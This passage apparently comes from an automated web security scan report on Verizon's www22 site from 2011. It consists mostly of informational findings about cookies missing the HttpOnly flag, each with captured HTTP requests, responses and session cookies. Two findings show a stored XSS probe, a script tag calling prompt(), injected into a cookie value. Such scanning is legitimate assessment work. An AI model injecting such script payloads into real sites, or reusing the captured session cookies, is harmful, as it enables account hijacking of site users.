GET /content/verizonglobalhome/Intermediate.aspx HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 366
Cache-Control: private, max-age=1666
Date: Mon, 05 Sep 2011 22:19:23 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:24:23 GMT; path=/content/; domain=verizon.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>Check Availability</title>

</head>
<body >


<iframe src
...[SNIP]...

10.126. http://www22.verizon.com/content/verizonglobalhome/setValues.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /content/verizonglobalhome/setValues.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /content/verizonglobalhome/setValues.aspx?getVal1=1 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Content-Length: 0
Origin: http://www22.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; hbxRet=Y; V347=0; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 72
Date: Mon, 05 Sep 2011 22:16:57 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:21:57 GMT; path=/content/; domain=verizon.com

hsi,High Speed Internet Without Phone,39.99*/?lid=//global//residential^

10.127. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 10 Jun 2011 06:12:44 GMT
ETag: "122432c-740-4a55575437140:dtagent326GVC7"
Accept-Ranges: bytes
Content-Length: 1856
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: application/x-javascript
Cache-Control: public, max-age=14400
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=8C98328CB529EE605B41B254E42B3E4A; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660;path=/;httponly

/* ---------------------------------------------------------------------------------------------------------
Verizon Services Operations IT - Creative Development
   Leads:
   Lolly Chessie (lolly.che
...[SNIP]...

10.128. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/interactivemaps-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /onecms/vzcareers/ak-cached/4h/includes/javascript/interactivemaps-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/ak-cached/4h/includes/javascript/interactivemaps-min.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 19 Jun 2011 05:45:55 GMT
ETag: "2dc2b4-4910-4a60a21ee6d00:dtagent326GVC7"
Accept-Ranges: bytes
Content-Length: 18704
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: application/x-javascript
Cache-Control: public, max-age=14400
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=F0B2C87868F87FC6A655B69C67AB426A; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfeca45525d5f4f58455e445a4a423660;path=/;httponly

var geocoder="";var map;var markersArray=[];var redmarkers=[];var prevElement="";var markerElement="";var directionsDisplay;var directionsService="";var busUnit="";var busunit="";var resultsStart=0;va
...[SNIP]...

10.129. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.autocomplete.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.autocomplete.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.autocomplete.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 19 May 2011 00:35:03 GMT
ETag: "12242dc-3648-4a3962d1ade00:dtagent326GVC7"
Accept-Ranges: bytes
Content-Length: 13896
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: application/x-javascript
Cache-Control: public, max-age=14400
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=EE5AD3E136DED5D5213A809D2C43BE81; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660;path=/;httponly

jQuery.autocomplete = function(input, options) {
   // Create a link to self
   var me = this;

   // Create jQuery object for input element
   var $input = $(input).attr("autocomplete", "off");

   // A
...[SNIP]...

10.130. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.fancybox-1.3.4.pack_blkbg.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.fancybox-1.3.4.pack_blkbg.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.fancybox-1.3.4.pack_blkbg.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 19 May 2011 00:35:03 GMT
ETag: "2dc2c1-3d64-4a3962d1ade00:dtagent326GVC7"
Accept-Ranges: bytes
Content-Length: 15716
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: application/x-javascript
Cache-Control: public, max-age=14400
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=AD6328FE536A22C20265D4EAF77869AB; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfeca45525d5f4f58455e445a4a423660;path=/;httponly

/*
* FancyBox - jQuery Plugin
* Simple and fancy lightbox alternative
*
* Examples and documentation at: http://fancybox.net
*
* Copyright (c) 2008 - 2010 Janis Skarnelis
* That said, i
...[SNIP]...

10.131. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/resizeFlashContent.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /onecms/vzcareers/ak-cached/4h/includes/javascript/resizeFlashContent.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/ak-cached/4h/includes/javascript/resizeFlashContent.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 24 May 2011 07:49:04 GMT
ETag: "2dc2e6-3bb-4a400d279de40:dtagent326GVC7"
Accept-Ranges: bytes
Content-Length: 955
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: application/x-javascript
Cache-Control: public, max-age=14400
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=2A590482738580C9C42A61F79126E809; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfeca45525d5f4f58455e445a4a423660;path=/;httponly

// t: current time, b: begInnIng value, c: change In value, d: duration
jQuery.easing['jswing'] = jQuery.easing['swing'];

jQuery.extend( jQuery.easing,
{
   def: 'easeInOutQuart',
   swing: function (x,
...[SNIP]...

10.132. http://www22.verizon.com/onecms/vzcareers/includes/javascript/oo_engine.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /onecms/vzcareers/includes/javascript/oo_engine.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/includes/javascript/oo_engine.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 21 Apr 2011 00:33:39 GMT
ETag: "50034e-73e-4a162e48aa100:dtagent326GVC7"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 1854
Cneonction: close
Content-Type: application/x-javascript
Expires: Mon, 05 Sep 2011 22:18:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=A528D23E157B5DAF5094EF7EAA13842D; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660;path=/;httponly


/* OnlineOpinion (S3tS,1424b) */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var custom_var,_
...[SNIP]...

10.133. http://www22.verizon.com/residentialhelp/fiostv

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/fiostv

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /residentialhelp/fiostv HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; 
ECSPCookies=Partner=VZO&SolutionCenter=&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 239405
Expires: Mon, 05 Sep 2011 22:24:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:31 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; expires=Wed, 05-Sep-2012 22:24:31 GMT; path=/
Set-Cookie: ContextInfo_TV=FiOSTV; expires=Wed, 05-Sep-2012 22:24:31 GMT; path=/
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; expires=Wed, 05-Sep-2012 22:24:31 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | FiOS TV
</title><meta http-equiv="Content-Type" content="text/html;
...[SNIP]...

10.134. http://www22.verizon.com/residentialhelp/inhomeagent

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/inhomeagent

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /residentialhelp/inhomeagent HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 215655
Expires: Mon, 05 Sep 2011 22:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:25 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=InHomeAgent&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:25 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/l
...[SNIP]...

10.135. http://www22.verizon.com/residentialhelp/inhomeagent/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/inhomeagent/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /residentialhelp/inhomeagent/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 215661
Expires: Mon, 05 Sep 2011 22:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:25 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=InHomeAgent&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:25 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/l
...[SNIP]...

10.136. http://www22.verizon.com/residentialhelp/phone

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp/phone

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
